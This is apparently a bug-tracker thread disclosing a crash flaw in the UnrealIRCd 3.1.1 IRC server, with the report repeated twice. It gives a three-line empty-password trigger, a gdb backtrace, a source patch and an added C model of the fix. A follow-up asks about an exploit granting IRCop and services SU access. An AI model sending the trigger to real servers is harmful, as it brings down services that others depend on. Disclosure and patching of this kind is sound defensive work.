I found an exploit in UnrealIRCD while I was coding my own
services server. I attach my code that can bring down Unreal3.1.1-
Dark.... (Tested on FreeBSD 4.0)
To use my code you have to add a C/N line.
[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash
Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
------------------------------------------------------------------------
Result:
(Core Dump)
Description:
If your machine has a C/N line on the TARGET machine,
you can bring down the TARGET without a link password. Just send an
empty password to the TARGET.
PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName
Note: --TO TEST THIS --
1. Some (almost all) Telnet clients send \r\n. You have to write
your own client to test it!
2. You must have a C/N line on the remote machine and provide the
correct SERVER name!
Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800, buffer=0x814e8dc "SERVER", bufend=0x814e8ff "", mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800, buffer=0x8115360 "SERVER services.thai.com 1 :ThaiNeT\r\n", length=37) at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800, rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2, listp=0x8123620) at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at ircd.c:1372
Logged In: YES
user_id=201895
Hi,
I found an exploit in UnrealIRCD while I was coding my own
services server. I attach my code that can bring down Unreal3.1.1-
Dark.... (Tested on FreeBSD 4.0)
To use my code you have to add a C/N line.
[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash
Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
------------------------------------------------------------------------
Result:
(Core Dump)
Description:
If your machine has a C/N line on the TARGET machine,
you can bring down the TARGET without a link password. Just send an
empty password to the TARGET.
PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName
Note: --TO TEST THIS --
1. Some (almost all) Telnet clients send \r\n. You have to write
your own client to test it!
2. You must have a C/N line on the remote machine and provide the
correct SERVER name!
------------------------------------------------------------------------
Correction:
s_serv.c:int m_server(cptr, sptr, parc, parv)
___________________________________________________
/* Original */
...
...
encr = "";
#else
encr = cptr->passwd;
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd, encr))
{
___________________________________________________
/* Fixed */
...
...
encr = "";
#else
/* Bug fixed by JUStice!krissada@citizen.in.th */
if (cptr->passwd) encr = cptr->passwd;
else encr = "";
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd, encr))
{
...
...
___________________________________________________
Note:
encr->passwd refers to a NULL pointer.
Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800, buffer=0x814e8dc "SERVER", bufend=0x814e8ff "", mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800, buffer=0x8115360 "SERVER services.thai.com 1 :ThaiNeT\r\n", length=37) at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800, rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2, listp=0x8123620) at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at ircd.c:1372
(FreeBSD 4.0-RELEASE i386)
___________________________________________________
JUStice!krissada@citizen.in.th
Thai IRC Network (ThaiNeT)
irc://irc.thai.com
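An added example, not UnrealIRCd's code and not part of the report above: a self-contained model of the link-password check that the Correction section patches. It parses the PASS line, stores an empty password as a NULL pointer (assumed from the report's note that the dereferenced pointer was NULL), and applies the fix's NULL-safe comparison so a configured C/N password is still enforced without dereferencing NULL. The names link_conf, peer, trailing_param, handle_pass, check_link_password and link_allowed are assumptions.

```c
/* Added example, not UnrealIRCd code: models the link-password check in the
 * report. Names (link_conf, peer, trailing_param, handle_pass, link_allowed)
 * are hypothetical; storing an empty PASS as NULL is assumed from the report. */
#include <stdlib.h>
#include <string.h>

struct link_conf { const char *passwd; };  /* password on the C/N line */
struct peer      { char *passwd;       };  /* sent with PASS, NULL if none */

/* Trailing parameter of an IRC line: "PASS :secret" -> "secret",
 * "PASS :" -> "" (the empty password the report sends). */
static const char *trailing_param(const char *line)
{
    const char *p = strstr(line, " :");
    return p ? p + 2 : "";
}

/* Modelled on m_pass: an empty password leaves cptr->passwd NULL (the pointer m_server dereferenced). */
static void handle_pass(struct peer *cptr, const char *line)
{
    const char *pw = trailing_param(line);
    free(cptr->passwd);
    cptr->passwd = NULL;
    if (*pw && (cptr->passwd = malloc(strlen(pw) + 1)) != NULL)
        strcpy(cptr->passwd, pw);
}

/* The report's fix: a NULL cptr->passwd becomes "" before the compare; a configured password is still enforced. */
static int check_link_password(const struct link_conf *aconf,
                               const struct peer *cptr)
{
    const char *encr = cptr->passwd ? cptr->passwd : "";
    if (*aconf->passwd && strcmp(aconf->passwd, encr) != 0)
        return 0;  /* missing or wrong password: refuse the link */
    return 1;
}

/* One handshake against a C/N line: 1 = link accepted, 0 = refused. */
int link_allowed(const char *conf_passwd, const char *pass_line)
{
    struct link_conf aconf = { conf_passwd };
    struct peer cptr = { NULL };
    int ok;
    handle_pass(&cptr, pass_line);
    ok = check_link_password(&aconf, &cptr);
    free(cptr.passwd);
    return ok;
}
```

With a password configured on the C/N line, the empty "PASS :" from the report is now refused instead of crashing the daemon; with no password configured, the link is accepted as before.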
Logged In: YES
user_id=418994
Do you know anything about an exploit which uses hex codes like
0x8070cb0 0x8084600 0x8095c28, which gives any user IRCOP
privileges and also gets SU ACCESS from the IRC Services... Any?